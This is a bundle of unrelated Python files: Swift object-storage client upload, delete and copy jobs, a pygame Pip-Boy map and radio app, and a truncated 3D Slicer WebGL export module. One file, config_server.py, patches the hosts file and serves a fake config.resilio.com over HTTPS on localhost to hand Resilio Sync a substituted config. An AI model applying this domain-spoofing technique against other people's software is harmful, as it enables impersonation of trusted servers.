policy_header = {
POLICY: _meta.get('x-storage-policy')
}
if headers is None:
headers = policy_header
else:
headers.update(policy_header)
conn.put_container(
container, headers, response_dict=create_response
)
res.update({
'success': True,
'response_dict': create_response
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': create_response
})
return res
@staticmethod
def _create_dir_marker_job(conn, container, obj, options, path=None):
res = {
'action': 'create_dir_marker',
'container': container,
'object': obj,
'path': path
}
results_dict = {}
if obj.startswith('./') or obj.startswith('.\\'):
obj = obj[2:]
if obj.startswith('/'):
obj = obj[1:]
if path is not None:
put_headers = {'x-object-meta-mtime': "%f" % getmtime(path)}
else:
put_headers = {'x-object-meta-mtime': "%f" % round(time())}
res['headers'] = put_headers
if options['changed']:
try:
headers = conn.head_object(container, obj)
ct = headers.get('content-type', '').split(';', 1)[0]
cl = int(headers.get('content-length'))
et = headers.get('etag')
mt = headers.get('x-object-meta-mtime')
if (ct in KNOWN_DIR_MARKERS and
cl == 0 and
et == EMPTY_ETAG and
mt == put_headers['x-object-meta-mtime']):
res['success'] = True
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
try:
conn.put_object(container, obj, '', content_length=0,
content_type=KNOWN_DIR_MARKERS[0],
headers=put_headers,
response_dict=results_dict)
res.update({
'success': True,
'response_dict': results_dict})
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict})
return res
@staticmethod
def _upload_segment_job(conn, path, container, segment_name, segment_start,
segment_size, segment_index, obj_name, options,
results_queue=None):
results_dict = {}
if options['segment_container']:
segment_container = options['segment_container']
else:
segment_container = container + '_segments'
res = {
'action': 'upload_segment',
'for_container': container,
'for_object': obj_name,
'segment_index': segment_index,
'segment_size': segment_size,
'segment_location': '/%s/%s' % (segment_container,
segment_name),
'log_line': '%s segment %s' % (obj_name, segment_index),
}
try:
fp = open(path, 'rb')
fp.seek(segment_start)
contents = LengthWrapper(fp, segment_size, md5=options['checksum'])
etag = conn.put_object(
segment_container,
segment_name,
contents,
content_length=segment_size,
content_type='application/swiftclient-segment',
response_dict=results_dict)
if options['checksum'] and etag and etag != contents.get_md5sum():
raise SwiftError('Segment {0}: upload verification failed: '
'md5 mismatch, local {1} != remote {2} '
'(remote segment has not been removed)'
.format(segment_index,
contents.get_md5sum(),
etag))
res.update({
'success': True,
'response_dict': results_dict,
'segment_etag': etag,
'attempts': conn.attempts
})
if results_queue is not None:
results_queue.put(res)
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict,
'attempts': conn.attempts
})
if results_queue is not None:
results_queue.put(res)
return res
def _get_chunk_data(self, conn, container, obj, headers, manifest=None):
chunks = []
if 'x-object-manifest' in headers:
scontainer, sprefix = headers['x-object-manifest'].split('/', 1)
for part in self.list(scontainer, {'prefix': sprefix}):
if part["success"]:
chunks.extend(part["listing"])
else:
raise part["error"]
elif config_true_value(headers.get('x-static-large-object')):
if manifest is None:
headers, manifest = conn.get_object(
container, obj, query_string='multipart-manifest=get')
manifest = parse_api_response(headers, manifest)
for chunk in manifest:
if chunk.get('sub_slo'):
scont, sobj = chunk['name'].lstrip('/').split('/', 1)
chunks.extend(self._get_chunk_data(
conn, scont, sobj, {'x-static-large-object': True}))
else:
chunks.append(chunk)
else:
chunks.append({'hash': headers.get('etag').strip('"'),
'bytes': int(headers.get('content-length'))})
return chunks
def _is_identical(self, chunk_data, path):
try:
fp = open(path, 'rb')
except IOError:
return False
with fp:
for chunk in chunk_data:
to_read = chunk['bytes']
md5sum = md5()
while to_read:
data = fp.read(min(65536, to_read))
if not data:
return False
md5sum.update(data)
to_read -= len(data)
if md5sum.hexdigest() != chunk['hash']:
return False
# Each chunk is verified; check that we're at the end of the file
return not fp.read(1)
def _upload_object_job(self, conn, container, source, obj, options,
results_queue=None):
if obj.startswith('./') or obj.startswith('.\\'):
obj = obj[2:]
if obj.startswith('/'):
obj = obj[1:]
res = {
'action': 'upload_object',
'container': container,
'object': obj
}
if hasattr(source, 'read'):
stream = source
path = None
else:
path = source
res['path'] = path
try:
if path is not None:
put_headers = {'x-object-meta-mtime': "%f" % getmtime(path)}
else:
put_headers = {'x-object-meta-mtime': "%f" % round(time())}
res['headers'] = put_headers
# We need to HEAD all objects now in case we're overwriting a
# manifest object and need to delete the old segments
# ourselves.
old_manifest = None
old_slo_manifest_paths = []
new_slo_manifest_paths = set()
segment_size = int(0 if options['segment_size'] is None
else options['segment_size'])
if (options['changed'] or options['skip_identical']
or not options['leave_segments']):
try:
headers = conn.head_object(container, obj)
is_slo = config_true_value(
headers.get('x-static-large-object'))
if options['skip_identical'] or (
is_slo and not options['leave_segments']):
chunk_data = self._get_chunk_data(
conn, container, obj, headers)
if options['skip_identical'] and self._is_identical(
chunk_data, path):
res.update({
'success': True,
'status': 'skipped-identical'
})
return res
cl = int(headers.get('content-length'))
mt = headers.get('x-object-meta-mtime')
if (path is not None and options['changed']
and cl == getsize(path)
and mt == put_headers['x-object-meta-mtime']):
res.update({
'success': True,
'status': 'skipped-changed'
})
return res
if not options['leave_segments']:
old_manifest = headers.get('x-object-manifest')
if is_slo:
for old_seg in chunk_data:
seg_path = old_seg['name'].lstrip('/')
if isinstance(seg_path, text_type):
seg_path = seg_path.encode('utf-8')
old_slo_manifest_paths.append(seg_path)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Merge the command line header options to the put_headers
put_headers.update(split_headers(options['header'], ''))
# Don't do segment job if object is not big enough, and never do
# a segment job if we're reading from a stream - we may fail if we
# go over the single object limit, but this gives us a nice way
# to create objects from memory
if (path is not None and segment_size
and (getsize(path) > segment_size)):
res['large_object'] = True
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
full_size = getsize(path)
segment_futures = []
segment_pool = self.thread_manager.segment_pool
segment = 0
segment_start = 0
while segment_start < full_size:
if segment_start + segment_size > full_size:
segment_size = full_size - segment_start
if options['use_slo']:
segment_name = '%s/slo/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
else:
segment_name = '%s/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
seg = segment_pool.submit(
self._upload_segment_job, path, container,
segment_name, segment_start, segment_size, segment,
obj, options, results_queue=results_queue
)
segment_futures.append(seg)
segment += 1
segment_start += segment_size
segment_results = []
errors = False
exceptions = []
for f in interruptable_as_completed(segment_futures):
try:
r = f.result()
if not r['success']:
errors = True
segment_results.append(r)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
errors = True
exceptions.append((err, traceback, err_time))
if errors:
err = ClientException(
'Aborting manifest creation '
'because not all segments could be uploaded. %s/%s'
% (container, obj))
res.update({
'success': False,
'error': err,
'exceptions': exceptions,
'segment_results': segment_results
})
return res
res['segment_results'] = segment_results
if options['use_slo']:
segment_results.sort(key=lambda di: di['segment_index'])
for seg in segment_results:
seg_loc = seg['segment_location'].lstrip('/')
if isinstance(seg_loc, text_type):
seg_loc = seg_loc.encode('utf-8')
new_slo_manifest_paths.add(seg_loc)
manifest_data = json.dumps([
{
'path': d['segment_location'],
'etag': d['segment_etag'],
'size_bytes': d['segment_size']
} for d in segment_results
])
put_headers['x-static-large-object'] = 'true'
mr = {}
conn.put_object(
container, obj, manifest_data,
headers=put_headers,
query_string='multipart-manifest=put',
response_dict=mr
)
res['manifest_response_dict'] = mr
else:
new_object_manifest = '%s/%s/%s/%s/%s/' % (
quote(seg_container.encode('utf8')),
quote(obj.encode('utf8')),
put_headers['x-object-meta-mtime'], full_size,
options['segment_size'])
if old_manifest and old_manifest.rstrip('/') == \
new_object_manifest.rstrip('/'):
old_manifest = None
put_headers['x-object-manifest'] = new_object_manifest
mr = {}
conn.put_object(
container, obj, '', content_length=0,
headers=put_headers,
response_dict=mr
)
res['manifest_response_dict'] = mr
else:
res['large_object'] = False
obr = {}
if path is not None:
content_length = getsize(path)
contents = LengthWrapper(open(path, 'rb'),
content_length,
md5=options['checksum'])
else:
content_length = None
contents = ReadableToIterable(stream,
md5=options['checksum'])
etag = conn.put_object(
container, obj, contents,
content_length=content_length, headers=put_headers,
response_dict=obr
)
res['response_dict'] = obr
if (options['checksum'] and
etag and etag != contents.get_md5sum()):
raise SwiftError('Object upload verification failed: '
'md5 mismatch, local {0} != remote {1} '
'(remote object has not been removed)'
.format(contents.get_md5sum(), etag))
if old_manifest or old_slo_manifest_paths:
drs = []
delobjsmap = {}
if old_manifest:
scontainer, sprefix = old_manifest.split('/', 1)
sprefix = sprefix.rstrip('/') + '/'
delobjsmap[scontainer] = []
for part in self.list(scontainer, {'prefix': sprefix}):
if not part["success"]:
raise part["error"]
delobjsmap[scontainer].extend(
seg['name'] for seg in part['listing'])
if old_slo_manifest_paths:
for seg_to_delete in old_slo_manifest_paths:
if seg_to_delete in new_slo_manifest_paths:
continue
scont, sobj = \
seg_to_delete.split(b'/', 1)
delobjs_cont = delobjsmap.get(scont, [])
delobjs_cont.append(sobj)
delobjsmap[scont] = delobjs_cont
del_segs = []
for dscont, dsobjs in delobjsmap.items():
for dsobj in dsobjs:
del_seg = self.thread_manager.segment_pool.submit(
self._delete_segment, dscont, dsobj,
results_queue=results_queue
)
del_segs.append(del_seg)
for del_seg in interruptable_as_completed(del_segs):
drs.append(del_seg.result())
res['segment_delete_results'] = drs
# return dict for printing
res.update({
'success': True,
'status': 'uploaded',
'attempts': conn.attempts})
return res
except OSError as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.errno == ENOENT:
error = SwiftError('Local file %r not found' % path, exc=err)
else:
error = err
res.update({
'success': False,
'error': error,
'traceback': traceback,
'error_timestamp': err_time
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Delete related methods
#
def delete(self, container=None, objects=None, options=None):
"""
Delete operations on an account, optional container and optional list
of objects.
:param container: The container to delete or delete from.
:param objects: The list of objects to delete.
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'yes_all': False,
'leave_segments': False,
'prefix': None,
}
:returns: A generator for returning the results of the delete
operations. Each result yielded from the generator is either
a 'delete_container', 'delete_object', 'delete_segment', or
'bulk_delete' dictionary containing the results of an
individual delete operation.
:raises: ClientException
:raises: SwiftError
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if container is not None:
if objects is not None:
if options['prefix']:
objects = [obj for obj in objects
if obj.startswith(options['prefix'])]
rq = Queue()
obj_dels = {}
if self._should_bulk_delete(objects):
for obj_slice in n_groups(
objects, self._options['object_dd_threads']):
self._bulk_delete(container, obj_slice, options,
obj_dels)
else:
self._per_item_delete(container, objects, options,
obj_dels, rq)
# Start a thread to watch for delete results
Thread(
target=self._watch_futures, args=(obj_dels, rq)
).start()
# yield results as they become available, raising the first
# encountered exception
res = get_from_queue(rq)
while res is not None:
yield res
# Cancel the remaining jobs if necessary
if options['fail_fast'] and not res['success']:
for d in obj_dels.keys():
d.cancel()
res = get_from_queue(rq)
else:
for res in self._delete_container(container, options):
yield res
else:
if objects:
raise SwiftError('Objects specified without container')
if options['prefix']:
raise SwiftError('Prefix specified without container')
if options['yes_all']:
cancelled = False
containers = []
for part in self.list():
if part["success"]:
containers.extend(c['name'] for c in part['listing'])
else:
raise part["error"]
for con in containers:
if cancelled:
break
else:
for res in self._delete_container(
con, options=options):
yield res
# Cancel the remaining container deletes, but yield
# any pending results
if (not cancelled and options['fail_fast']
and not res['success']):
cancelled = True
def _should_bulk_delete(self, objects):
if len(objects) < 2 * self._options['object_dd_threads']:
# Not many objects; may as well delete one-by-one
return False
try:
cap_result = self.capabilities()
if not cap_result['success']:
# This shouldn't actually happen, but just in case we start
# being more nuanced about our capabilities result...
return False
except ClientException:
# Old swift, presumably; assume no bulk middleware
return False
swift_info = cap_result['capabilities']
return 'bulk_delete' in swift_info
def _per_item_delete(self, container, objects, options, rdict, rq):
for obj in objects:
obj_del = self.thread_manager.object_dd_pool.submit(
self._delete_object, container, obj, options,
results_queue=rq
)
obj_details = {'container': container, 'object': obj}
rdict[obj_del] = obj_details
@staticmethod
def _delete_segment(conn, container, obj, results_queue=None):
results_dict = {}
try:
conn.delete_object(container, obj, response_dict=results_dict)
res = {'success': True}
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
res.update({
'action': 'delete_segment',
'container': container,
'object': obj,
'attempts': conn.attempts,
'response_dict': results_dict
})
if results_queue is not None:
results_queue.put(res)
return res
def _delete_object(self, conn, container, obj, options,
results_queue=None):
res = {
'action': 'delete_object',
'container': container,
'object': obj
}
try:
old_manifest = None
query_string = None
if not options['leave_segments']:
try:
headers = conn.head_object(container, obj)
old_manifest = headers.get('x-object-manifest')
if config_true_value(headers.get('x-static-large-object')):
query_string = 'multipart-manifest=delete'
except ClientException as err:
if err.http_status != 404:
raise
results_dict = {}
conn.delete_object(container, obj, query_string=query_string,
response_dict=results_dict)
if old_manifest:
dlo_segments_deleted = True
segment_pool = self.thread_manager.segment_pool
s_container, s_prefix = old_manifest.split('/', 1)
s_prefix = s_prefix.rstrip('/') + '/'
del_segs = []
for part in self.list(
container=s_container, options={'prefix': s_prefix}):
if part["success"]:
seg_list = [o["name"] for o in part["listing"]]
else:
raise part["error"]
for seg in seg_list:
del_seg = segment_pool.submit(
self._delete_segment, s_container,
seg, results_queue=results_queue
)
del_segs.append(del_seg)
for del_seg in interruptable_as_completed(del_segs):
del_res = del_seg.result()
if not del_res["success"]:
dlo_segments_deleted = False
res['dlo_segments_deleted'] = dlo_segments_deleted
res.update({
'success': True,
'response_dict': results_dict,
'attempts': conn.attempts,
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
return res
@staticmethod
def _delete_empty_container(conn, container):
results_dict = {}
try:
conn.delete_container(container, response_dict=results_dict)
res = {'success': True}
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
res.update({
'action': 'delete_container',
'container': container,
'object': None,
'attempts': conn.attempts,
'response_dict': results_dict
})
return res
def _delete_container(self, container, options):
try:
for part in self.list(container=container, options=options):
if not part["success"]:
raise part["error"]
for res in self.delete(
container=container,
objects=[o['name'] for o in part['listing']],
options=options):
yield res
if options['prefix']:
# We're only deleting a subset of objects within the container
return
con_del = self.thread_manager.container_pool.submit(
self._delete_empty_container, container
)
con_del_res = get_future_result(con_del)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
con_del_res = {
'action': 'delete_container',
'container': container,
'object': None,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
yield con_del_res
# Bulk methods
#
def _bulk_delete(self, container, objects, options, rdict):
if objects:
bulk_del = self.thread_manager.object_dd_pool.submit(
self._bulkdelete, container, objects, options
)
bulk_details = {'container': container, 'objects': objects}
rdict[bulk_del] = bulk_details
@staticmethod
def _bulkdelete(conn, container, objects, options):
results_dict = {}
try:
headers = {
'Accept': 'application/json',
'Content-Type': 'text/plain',
}
res = {'container': container, 'objects': objects}
objects = [quote(('/%s/%s' % (container, obj)).encode('utf-8'))
for obj in objects]
headers, body = conn.post_account(
headers=headers,
query_string='bulk-delete',
data=b''.join(obj.encode('utf-8') + b'\n' for obj in objects),
response_dict=results_dict)
if body:
res.update({'success': True,
'result': parse_api_response(headers, body)})
else:
res.update({
'success': False,
'error': SwiftError(
'No content received on account POST. '
'Is the bulk operations middleware enabled?')})
except Exception as e:
res.update({'success': False, 'error': e})
res.update({
'action': 'bulk_delete',
'attempts': conn.attempts,
'response_dict': results_dict
})
return res
# Copy related methods
#
def copy(self, container, objects, options=None):
"""
Copy operations on a list of objects in a container. Destination
containers will be created.
:param container: The container from which to copy the objects.
:param objects: A list of object names (strings) or SwiftCopyObject
instances containing an object name and an
options dict (can be None) to override the options for
that individual copy operation::
[
'object_name',
SwiftCopyObject(
'object_name',
options={
'destination': '/container/object',
'fresh_metadata': False,
...
}),
...
]
The options dict is described below.
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all copy operations
performed by this call, unless overridden on a per
object basis.
The options "destination" and "fresh_metadata" do
not need to be set, in this case objects will be
copied onto themselves and metadata will not be
refreshed.
The option "destination" can also be specified in the
format '/container', in which case objects without an
explicit destination will be copied to the destination
/container/original_object_name. Combinations of
multiple objects and a destination in the format
'/container/object' is invalid. Possible options are
given below::
{
'meta': [],
'header': [],
'destination': '/container/object',
'fresh_metadata': False,
}
:returns: A generator returning the results of copying the given list
of objects.
:raises: SwiftError
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
# Try to create the container, just in case it doesn't exist. If this
# fails, it might just be because the user doesn't have container PUT
# permissions, so we'll ignore any error. If there's really a problem,
# it'll surface on the first object COPY.
containers = set(
next(p for p in obj.destination.split("/") if p)
for obj in objects
if isinstance(obj, SwiftCopyObject) and obj.destination
)
if options.get('destination'):
destination_split = options['destination'].split('/')
if destination_split[0]:
raise SwiftError("destination must be in format /cont[/obj]")
_str_objs = [
o for o in objects if not isinstance(o, SwiftCopyObject)
]
if len(destination_split) > 2 and len(_str_objs) > 1:
# TODO (clayg): could be useful to copy multiple objects into
# a destination like "/container/common/prefix/for/objects/"
# where the trailing "/" indicates the destination option is a
# prefix!
raise SwiftError("Combination of multiple objects and "
"destination including object is invalid")
if destination_split[-1] == '':
# N.B. this protects the above case
raise SwiftError("destination can not end in a slash")
containers.add(destination_split[1])
policy_header = {}
_header = split_headers(options["header"])
if POLICY in _header:
policy_header[POLICY] = _header[POLICY]
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, cont, headers=policy_header)
for cont in containers
]
# wait for container creation jobs to complete before any COPY
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
copy_futures = []
copy_objects = self._make_copy_objects(objects, options)
for copy_object in copy_objects:
obj = copy_object.object_name
obj_options = copy_object.options
destination = copy_object.destination
fresh_metadata = copy_object.fresh_metadata
headers = split_headers(
options['meta'], 'X-Object-Meta-')
# add header options to the headers object for the request.
headers.update(
split_headers(options['header'], ''))
if obj_options is not None:
if 'meta' in obj_options:
headers.update(
split_headers(
obj_options['meta'], 'X-Object-Meta-'
)
)
if 'header' in obj_options:
headers.update(
split_headers(obj_options['header'], '')
)
copy = self.thread_manager.object_uu_pool.submit(
self._copy_object_job, container, obj, destination,
headers, fresh_metadata
)
copy_futures.append(copy)
for r in interruptable_as_completed(copy_futures):
res = r.result()
yield res
@staticmethod
def _make_copy_objects(objects, options):
copy_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftCopyObject(o, options)
copy_objects.append(obj)
elif isinstance(o, SwiftCopyObject):
copy_objects.append(o)
else:
raise SwiftError(
"The copy operation takes only strings or "
"SwiftCopyObjects as input",
obj=o)
return copy_objects
@staticmethod
def _copy_object_job(conn, container, obj, destination, headers,
fresh_metadata):
response_dict = {}
res = {
'success': True,
'action': 'copy_object',
'container': container,
'object': obj,
'destination': destination,
'headers': headers,
'fresh_metadata': fresh_metadata,
'response_dict': response_dict
}
try:
conn.copy_object(
container, obj, destination=destination, headers=headers,
fresh_metadata=fresh_metadata, response_dict=response_dict)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Capabilities related methods
#
def capabilities(self, url=None, refresh_cache=False):
"""
List the cluster capabilities.
:param url: Proxy URL of the cluster to retrieve capabilities.
:returns: A dictionary containing the capabilities of the cluster.
:raises: ClientException
"""
if not refresh_cache and url in self.capabilities_cache:
return self.capabilities_cache[url]
res = {
'action': 'capabilities',
'timestamp': time(),
}
cap = self.thread_manager.container_pool.submit(
self._get_capabilities, url
)
capabilities = get_future_result(cap)
res.update({
'success': True,
'capabilities': capabilities
})
if url is not None:
res.update({
'url': url
})
self.capabilities_cache[url] = res
return res
@staticmethod
def _get_capabilities(conn, url):
return conn.get_capabilities(url)
# Helper methods
#
@staticmethod
def _watch_futures(futures, result_queue):
"""
Watches a dict of futures and pushes their results onto the given
queue. We use this to wait for a set of futures which may create
futures of their own to wait for, whilst also allowing us to
immediately return the results of those sub-jobs.
When all futures have completed, None is pushed to the queue
If the future is cancelled, we use the dict to return details about
the cancellation.
"""
futures_only = list(futures.keys())
for f in interruptable_as_completed(futures_only):
try:
r = f.result()
if r is not None:
result_queue.put(r)
except CancelledError:
details = futures[f]
res = details
res['status'] = 'cancelled'
result_queue.put(res)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
details = futures[f]
res = details
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
result_queue.put(res)
result_queue.put(None)
|
config_server.py
|
import BaseHTTPServer, SimpleHTTPServer
import ssl
import patch_hosts
import threading
BLOG_URL = "README.md"
class ConfigHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path.strip() == "/sync.conf":
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
print "Processed request from Sync. Server shutting down..."
assassin = threading.Thread(target=self.server.shutdown)
assassin.daemon = True
assassin.start()
else:
self.send_response(404, 'Not Found')
self.end_headers()
def main():
print "Please refer to %s for detailed instructions." % BLOG_URL
# Step 1
#print "\r\nStep 1: patch hosts file (Admin required)...",
if not patch_hosts.sync_patch_hosts(): return False
#print "Done"
# Step 2
#print "\r\nStep 2: start fake config.resilio.com server..."
httpd = BaseHTTPServer.HTTPServer(('127.0.0.1', 443), ConfigHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, keyfile='./resilio.key', certfile='./resilio.crt', server_side=True)
print "Fake server started."
print "After Sync has requested the config file, this program should go on automatically."
print "If this program blocks here, please refer to %s" % BLOG_URL
print """
*****************************
* Now, please restart Sync. *
*****************************
"""
httpd.serve_forever()
# Step 3
#print "\r\nStep 3: restore hosts file (Admin required)...",
if not patch_hosts.sync_unpatch_hosts(): return False
#print "Done"
return True
if __name__ == '__main__':
if main():
print "\r\nAll done. Sync should have updated the tracker/relay cache."
print "Press Enter to exit."
else:
print "Error and abort."
raw_input()
|
entities.py
|
import os
import game
import config
import pygame
import threading
import pypboy.data
from random import choice
class Map(game.Entity):
_mapper = None
_transposed = None
_size = 0
_fetching = None
_map_surface = None
_loading_size = 0
_render_rect = None
def __init__(self, width, render_rect=None, *args, **kwargs):
self._mapper = pypboy.data.Maps()
self._size = width
self._map_surface = pygame.Surface((width, width))
self._render_rect = render_rect
super(Map, self).__init__((width, width), *args, **kwargs)
text = config.FONTS[14].render("Loading map...", True, (95, 255, 177), (0, 0, 0))
self.image.blit(text, (10, 10))
def fetch_map(self, position, radius):
#(-5.9234923, 54.5899493)
self._fetching = threading.Thread(target=self._internal_fetch_map, args=(position, radius))
self._fetching.start()
def _internal_fetch_map(self, position, radius):
self._mapper.fetch_by_coordinate(position, radius)
self.redraw_map()
def update(self, *args, **kwargs):
super(Map, self).update(*args, **kwargs)
def move_map(self, x, y):
self._render_rect.move_ip(x, y)
def redraw_map(self, coef=1):
self._map_surface.fill((0, 0, 0))
for way in self._mapper.transpose_ways((self._size / coef, self._size / coef), (self._size / 2, self._size / 2)):
pygame.draw.lines(
self._map_surface,
(85, 251, 167),
False,
way,
2
)
for tag in self._mapper.transpose_tags((self._size / coef, self._size / coef), (self._size / 2, self._size / 2)):
if tag[3] in config.AMENITIES:
image = config.AMENITIES[tag[3]]
else:
print "Unknown amenity: %s" % tag[3]
image = config.MAP_ICONS['misc']
pygame.transform.scale(image, (10, 10))
self._map_surface.blit(image, (tag[1], tag[2]))
text = config.FONTS[12].render(tag[0], True, (95, 255, 177), (0, 0, 0))
self._map_surface.blit(text, (tag[1] + 17, tag[2] + 4))
self.image.blit(self._map_surface, (0, 0), area=self._render_rect)
class MapSquare(game.Entity):
_mapper = None
_size = 0
_fetching = None
_map_surface = None
map_position = (0, 0)
def __init__(self, size, map_position, parent, *args, **kwargs):
self._mapper = pypboy.data.Maps()
self._size = size
self.parent = parent
self._map_surface = pygame.Surface((size * 2, size * 2))
self.map_position = map_position
self.tags = {}
super(MapSquare, self).__init__((size, size), *args, **kwargs)
def fetch_map(self):
self._fetching = threading.Thread(target=self._internal_fetch_map)
self._fetching.start()
def _internal_fetch_map(self):
self._mapper.fetch_grid(self.map_position)
self.redraw_map()
self.parent.redraw_map()
def redraw_map(self, coef=1):
self._map_surface.fill((0, 0, 0))
for way in self._mapper.transpose_ways((self._size, self._size), (self._size / 2, self._size / 2)):
pygame.draw.lines(
self._map_surface,
(85, 251, 167),
False,
way,
1
)
for tag in self._mapper.transpose_tags((self._size, self._size), (self._size / 2, self._size / 2)):
self.tags[tag[0]] = (tag[1] + self.position[0], tag[2] + self.position[1], tag[3])
self.image.fill((0, 0, 0))
self.image.blit(self._map_surface, (-self._size / 2, -self._size / 2))
class MapGrid(game.Entity):
_grid = None
_delta = 0.002
_starting_position = (0, 0)
def __init__(self, starting_position, dimensions, *args, **kwargs):
self._grid = []
self._starting_position = starting_position
self.dimensions = dimensions
self._tag_surface = pygame.Surface(dimensions)
super(MapGrid, self).__init__(dimensions, *args, **kwargs)
self.tags = {}
self.fetch_outwards()
def test_fetch(self):
for x in range(10):
for y in range(5):
square = MapSquare(
100,
(
self._starting_position[0] + (self._delta * x),
self._starting_position[1] - (self._delta * y)
)
)
square.fetch_map()
square.position = (100 * x, 100 * y)
self._grid.append(square)
def fetch_outwards(self):
for x in range(-4, 4):
for y in range(-2, 2):
square = MapSquare(
86,
(
self._starting_position[0] + (self._delta * x),
self._starting_position[1] - (self._delta * y)
),
self
)
square.fetch_map()
square.position = ((86 * x) + (self.dimensions[0] / 2) - 43, (86 * y) + (self.dimensions[1] / 2) - 43)
self._grid.append(square)
def draw_tags(self):
self.tags = {}
for square in self._grid:
self.tags.update(square.tags)
self._tag_surface.fill((0, 0, 0))
for name in self.tags:
if self.tags[name][2] in config.AMENITIES:
image = config.AMENITIES[self.tags[name][2]]
else:
print "Unknown amenity: %s" % self.tags[name][2]
image = config.MAP_ICONS['misc']
pygame.transform.scale(image, (10, 10))
self.image.blit(image, (self.tags[name][0], self.tags[name][1]))
# try:
text = config.FONTS[12].render(name, True, (95, 255, 177), (0, 0, 0))
# text_width = text.get_size()[0]
# pygame.draw.rect(
# self,
# (0, 0, 0),
# (self.tags[name][0], self.tags[name][1], text_width + 4, 15),
# 0
# )
self.image.blit(text, (self.tags[name][0] + 17, self.tags[name][1] + 4))
# pygame.draw.rect(
# self,
# (95, 255, 177),
# (self.tags[name][0], self.tags[name][1], text_width + 4, 15),
# 1
# )
# except Exception, e:
# print(e)
# pass
def redraw_map(self, *args, **kwargs):
self.image.fill((0, 0, 0))
for square in self._grid:
self.image.blit(square._map_surface, square.position)
self.draw_tags()
class RadioStation(game.Entity):
STATES = {
'stopped': 0,
'playing': 1,
'paused': 2
}
def __init__(self, *args, **kwargs):
super(RadioStation, self).__init__((10, 10), *args, **kwargs)
self.state = self.STATES['stopped']
self.files = self.load_files()
pygame.mixer.music.set_endevent(config.EVENTS['SONG_END'])
def play_random(self):
f = choice(self.files)
self.filename = f
pygame.mixer.music.load(f)
pygame.mixer.music.play()
self.state = self.STATES['playing']
def play(self):
if self.state == self.STATES['paused']:
pygame.mixer.music.unpause()
self.state = self.STATES['playing']
else:
self.play_random()
def pause(self):
self.state = self.STATES['paused']
pygame.mixer.music.pause()
def stop(self):
self.state = self.STATES['stopped']
pygame.mixer.music.stop()
def load_files(self):
files = []
for f in os.listdir(self.directory):
if f.endswith(".mp3") or f.endswith(".ogg") or f.endswith(".wav"):
files.append(self.directory + f)
print files
return files
class GalaxyNewsRadio(RadioStation):
def __init__(self, *args, **kwargs):
self.directory = 'sounds/radio/gnr/'
super(GalaxyNewsRadio, self).__init__(self, *args, **kwargs)
|
WebGLExport.py
|
from __main__ import vtk, qt, ctk, slicer
import sys
import os
import shutil
import time
import uuid
import webbrowser
useWebserver = True
try:
# webserver support for easy display of local WebGL content
# on Windows it might not work, so catch any exceptions
import socket
import SimpleHTTPServer
import SocketServer
import multiprocessing as m
except:
useWebserver = False
# this module uses the following from http://www.quesucede.com/page/show/id/python_3_tree_implementation
#
#
# Python 3 Tree Implementation
#
# Copyright (C) 2011, Brett Alistair Kromkamp - brettkromkamp@gmail.com
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this list
# of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# Neither the name of the copyright holder nor the names of the contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
